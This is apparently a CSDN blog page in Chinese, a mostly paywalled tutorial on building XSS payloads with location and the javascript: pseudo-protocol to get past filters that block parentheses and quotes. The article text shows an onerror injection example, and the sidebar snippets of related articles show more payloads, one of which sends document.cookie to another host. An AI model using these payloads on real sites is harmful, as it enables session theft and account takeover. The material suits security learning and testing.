利用location来变形我们的XSS Payload

最新推荐文章于 2024-05-11 21:35:53 发布
最新推荐文章于 2024-05-11 21:35:53 发布
阅读量1.7k 收藏 6
点赞数
分类专栏: 黑客技术 文章标签: location XSS Payload 跨站攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zsuhoakd/article/details/69397980
版权
当遇到过滤特殊符号的XSS场景,本文介绍了如何利用location结合javascript伪协议来构造payload,绕过那些过滤了括号、&等字符的防御。通过将JS关键词转化为字符串,使用编码在字符串内进行操作,从而实现XSS攻击。
摘要由CSDN通过智能技术生成

在XSS的时候,有时候有的过滤器很变态,会过滤很多特殊符号和关键词,比如&、(、)、#、'、",特别是&和括号,少了的话payload很难构造出来。

举个例子吧,比如过滤器过滤了array("(",")","&","\\","<",">","'"),而没有过滤双引号,输出点在<img src="xxxx">,xxxx这里,怎么构造一个可以利用的XSS Payload?

过滤代码如下:


所有人肯定都知道,先闭合双引号,后面使用onerror事件触发XSS。输入xss=1" οnerrοr=alert(1),就可以构造成如下html:

最低0.47元/天 解锁文章
即刻出发吧
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XSS攻击 header(‘Location: ‘.$_GET[‘x‘]); 笔记
滕青山博客
02-17 827
前言 笔记来于 《web前端黑客技术揭秘》 第三章 书上原话: 第二个:http://www.foo.com/xss/re-flect2.php的代码如下。 <?php header('Location: '.$_GET['x']); ?> 输入x的值作为响应头部的Location字段值输出,意味着会发生跳转,触发XSS的其中一种方式如下 http://www.foo.com/book/reflect2.php?x=data:text/html;base64,PHNjcmlwd
XSS技巧拓展】————21、Location Based Payloads – Part I
Fly_鹏程万里
01-22 255
In researching a way to evade a filter which detects and blocks the XSS attempt in the presence of parentheses in a payload, I came to interesting solutions of this problem that will be shared in this...
2024年网络安全最全【XSS平台】使用,简单 payload 项目的创建(1),分享一点面试小经验
最新发布
2401_84301948的博客
05-11 673
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
XSS技巧拓展】————21、Location Based Payloads – Part II
Fly_鹏程万里
01-22 282
Without using parentheses to call functions and brackets to addressing chars in an array, we can only rely on document properties to make the XSS payload work. The first one we will use is tagName. In...
xss总结
qq_43550748的博客
01-30 321
xss总结 1.常用payload 1.//配合xss后台使用 <script>document.location='http://127.0.0.1?cookie=' + document.cookie</script> 或 <img src=x onerror=a=document.cookie;document.location='http://192.168....
XSS Payload 远程脚本攻击
kevon_sun的专栏
04-12 6111
今天看了一本书,关于web安全方面的,所以也动手测试了以下。下面就只讲一下 XSS Payload远程脚本攻击吧, 执行远程脚本,提取cookie先来个简单的吧&lt;script&gt;alert(1);&lt;/script&gt;首先说明像chrome、ie新版等浏览器已经有css防御比如以下是chrome浏览器打印出来的,chrome浏览器的安全机制是比较强大的后来试用了火狐浏览器,没想到...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
2020年仍然有效的一些XSS Payload
11-05
"2020年仍然有效的一些XSS Payload" XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的Web应用程序漏洞,攻击者可以通过在Web页面中inject恶意脚本代码来攻击用户。XSS攻击可以导致用户数据泄露、身份盗用、...
xss的各种payload脚本
08-12
xss 各种绕waf脚本语句
web安全之XSS攻击原理及防范
2401_83739727的博客
04-12 917
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
渗透测试笔记(五)——XSS跨站脚本攻击
m0_67044952的博客
06-12 1001
XSS:Cross Site Scripting(跨站脚本)为了避免与CSS混淆,所以简称XSSXSS是指恶意攻击利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到Web页面中去,使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。XSS攻击的危害盗取各类用户账号,如机器登录账号、用户网银账号、各类管理员账号控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力盗窃企业重要的具有商业价值的资料非法转账
xss常用Payload总结
csd_ct的专栏
01-03 1万+
xss常用Payload总结 渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用的xss注入的姿势 1.img 注入 快速探测是否存在xss 1) <img src='x' onerror='alert(1)'> 2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))"> 2.iframe 注入 后台做了相
xss绕过,payload全集
热门推荐
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
Web安全之XSS跨站脚本攻击
Button12138的博客
02-01 1168
XSS 攻击通常指黑客利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点
结合DVWA靶场学习XSS漏洞-盗取cookie
LUOBIKUN的博客
10-06 3009
XSS概述参考前置知识:定义分类反射型XSS:存储型XSSDOM型XSS危害防御练习(DVWA靶场)反射型:DVWA-low一般的XSS攻击重定向:DVWA-mediumDVWA-HighDVWA-Impossible存储型XSSDVWA-low一般的XSS攻击重定向:DVWA-mediumDVWA-low一般的XSS攻击重定向:获取cookieDVWA-mediumDVWA-high 参考 XSS攻击进阶篇——那些年我们看不懂的XSS 通过浏览器编码深入探究XSS绕过 DVWA-XSS学习笔记 前置知识:
XSS 漏洞总结
4ct10n
11-03 1万+
xss一直以来接触最少的类型,现在终于有幸将其总结一下了·····,xss漏洞是目前最为常见的漏洞类型之一,其触发脚本经常与js代码有关,所以要想掌握好xss必须要有深厚的js编码功底。本篇内容是我学习xss的总结,会结合着代码编写与实验,对xss进行系统的讲解,以便我更好的认识xss
XSS-Payload大全
gy1bubble的博客
10-11 1416
<body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKM.
xss payload
09-30
XSS跨站脚本攻击Payload是一种攻击技术,通过在网页中插入恶意代码来窃取用户信息或者对用户进行攻击。以下是几个XSS Payload的例子: 1. `<script>alert('XSS')</script>`:这个Payload会在页面加载时执行一个弹窗提醒,展示文本"XSS"。 2. `<img src='x' onerror='alert(1)'>`:这个Payload会尝试加载一个不存在的图片。由于图片加载失败,就会触发onerror事件,然后执行弹窗提醒,展示数字"1"。 3. `<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjM0KTs8L3NjcmlwdD4NCg=="></iframe>`:这个Payload将一个base64编码的脚本插入到一个隐藏的iframe中。这段脚本会执行一个弹窗提醒,展示数字"1234"。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值